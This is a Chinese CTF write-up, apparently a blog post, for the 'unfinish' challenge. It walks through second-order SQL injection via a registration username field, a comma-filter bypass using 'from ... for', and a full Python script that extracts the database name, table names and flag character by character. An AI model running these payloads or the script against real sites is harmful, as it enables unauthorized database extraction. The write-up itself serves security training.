当前位置:网站首页>攻防世界----unfinish
攻防世界----unfinish
2022-08-02 13:06:00 【jjj34】
知识点:SQL二次注入
sql注入流程:找到注入点,进行fuzz测试,根据fuzz测试结果绕过,查flag
1.拿到题目后,先进行目录扫描

2.经过一系列测试:包括在register页面注册,然后去login页面查看
发现,在register页面的username字段是可以回显的
为什么要在username字段测试注入点,而不是在邮箱或者密码?
因为我们能看到username的回显。
判断注入点
在用户名处输入
0' and '1 
确定了存在注入
3.进行fuzz测试,看能不能找到被过滤的关键字
尝试对username字段进行fuzz测试
测试范围为所有的单字符(ascii值33-127)

长度为904的报文被过滤了,也就是逗号

目前看来,只过滤了逗号
逗号的绕过:from for绕过
substr(database(),1) -> substr(database() from 1 for 1)payload如下
username: 0' + ascii(substr(database() from 1 for 1)) +'0原因:
在注册界面,有三个字段因此我们猜测原句为
insert('邮箱','用户名','密码')而用户名是可以存在注入,并且具有回显的
为什么要用 0?
ascii可以将字符转化为ascii的值,0+任何数字都等于原字符,用其他数字也是可以的
0附近的两个单引号是为了闭合原句的单引号,如下
insert('邮箱','0' + ascii(substr(database() from 1 for 1)) +'0','密码')
第二个payload为
0' + ascii(substr(database() from 2 for 1)) +'0 
接下来就是写脚本,让脚本帮我们爆破。
脚本思路:在register页面进行注册
账号就 [email protected]? 对?进行递增
用户名就是正常的盲注
密码就是 admin
注册好后,去login.php页面,拿邮箱和密码登录,然后获取到回显的用户名
利用chr()函数将数字转化为字母
脚本可以去wp里拿
import requests
import re
register_url = "http://61.147.171.105:64712/register.php"
login_url = "http://61.147.171.105:64712/login.php"
database = ""
table_name = ""
column_name = ""
flag = ""
#获取数据库名
for i in range(1,10):
register_data = {
'email':'[email protected]'+ str(i),
'username':"0'+ascii(substr((select database()) from %d for 1))+'0"%i,
'password':123
}
r = requests.post(url=register_url,data=register_data)
login_data = {
'email':'[email protected]'+ str(i),
'password':123
}
r = requests.post(url=login_url,data=login_data)
match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
asc = match.group(1)
if asc == '0':
break
database = database + chr(int(asc))
print('database:',database)
#获取表名
'''
for i in range(1,20):
register_data = {
'email':'[email protected]'+ str(i),
'username':"0'+ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))+'0"%i,
'password':123
}
r = requests.post(url=register_url,data=register_data)
print(r.text)
login_data = {
'email':'[email protected]'+ str(i),
'password':123
}
r = requests.post(url=login_url,data=login_data)
r.encoding = r.apparent_encoding
print(r.text)
match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
asc = match.group(1)
if asc == '0':
break
table_name = table_name + chr(int(asc))
print('table_name:',table_name)
'''
#获取flag
for i in range(1,100):
register_data = {
'email':'[email protected]'+ str(i) + str(i),
'username':"0'+ascii(substr((select * from flag) from %d for 1))+'0"%i,
'password':123
}
r = requests.post(url=register_url,data=register_data)
login_data = {
'email':'[email protected]'+ str(i) + str(i),
'password':123
}
r = requests.post(url=login_url,data=login_data)
match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
asc = match.group(1)
if asc == '0':
break
flag = flag + chr(int(asc))
print('flag:',flag)脚本解说
1.re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
因为用户名在html中是这么显示的
![]()
因此我们需要用到research函数结合正则匹配
re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
\s匹配空白符
\d匹配数字python正则表达式re.search()怎么使用? | w3c笔记 (w3cschool.cn)
2.asc = match.group(1)
原因:group(n)匹配第n个括号内的值
上文中 group(1) 就是匹配到 (\d*)也就是我们要的数字
import re
content = "abc123def"
rex_compile = re.compile("([a-z]*)([0-9]*)([a-z]*)")
rex = rex_compile.search(content)
print(rex.group())
print(rex.group(0)) # group()和group(0) 一样匹配的是整体
print(rex.group(1)) # 匹配第一个小括号的内容
print(rex.group(2)) # 匹配第二个小括号的内容
print(rex.group(3)) # 匹配第三个小括号的内容3.注意点
由于用户名是有限制的,因此在跑表名的时候会因为这个问题导致失败,需要手工去跑
边栏推荐
- Flashback Technology of Oracle Database
- FreeRTOS--Priority Experiment
- PHP+MYSQL [Student Information Management System] (Minimalist Edition)
- [b01lers2020]Welcome to Earth-1
- First acquaintance of scrapy framework 1
- Object.entries()
- Enterprise Network Planning Based on Huawei eNSP
- 86.(cesium之家)cesium叠加面接收阴影效果(gltf模型)
- php - the first of three solid foundations
- FreeRTOS中名称规范
猜你喜欢

如何通过DBeaver 连接 TDengine?

鲁大师7月新机性能/流畅榜:性能跑分突破123万!

你知道图论的Dijkstra吗?

FreeRTOS experiment -- delete task

你知道图论的spfa吗?

SQL Server 2014 installation tutorial (nanny-level graphic tutorial)

路由-Tab切换页面

Article 48 - Analysis of timestamp2 parameters【2022-08-01】

qt 编译报错 No rule to make target

图论之Kruskal,最小生成树如何优雅解题?
随机推荐
机器人碰撞检测方法形式化
LeetCode_139_word split
Do you know Dijkstra of graph theory?
设置代理服务器(谷歌+IE)「建议收藏」
图文短视频自媒体怎么创作?如何让点击量达到10W?
Automatically generate code generator recommendation-code-gen
80篇国产数据库实操文档汇总(含TiDB、达梦、openGauss等)
js true 3d histogram plugin
Redis all
How to turn off hardware acceleration [easy to understand]
如何关闭开启硬件加速[通俗易懂]
Name conventions in FreeRTOS
瀑布流式布局怎么实现(什么是瀑布流布局)
【C语言】细品分支结构——if-else语句
Flashback Technology of Oracle Database
WeChat applet getPhoneNumber interface code=40013
使用Amazon SageMaker 构建基于自然语言处理的文本摘要应用
Interpretation of new features | MySQL 8.0 GIPK invisible primary key
汉源高科千兆12光12电管理型工业以太网交换机 12千兆光12千兆电口宽温环网交换机
To eliminate air bubbles to save the mushroom h5 small game source code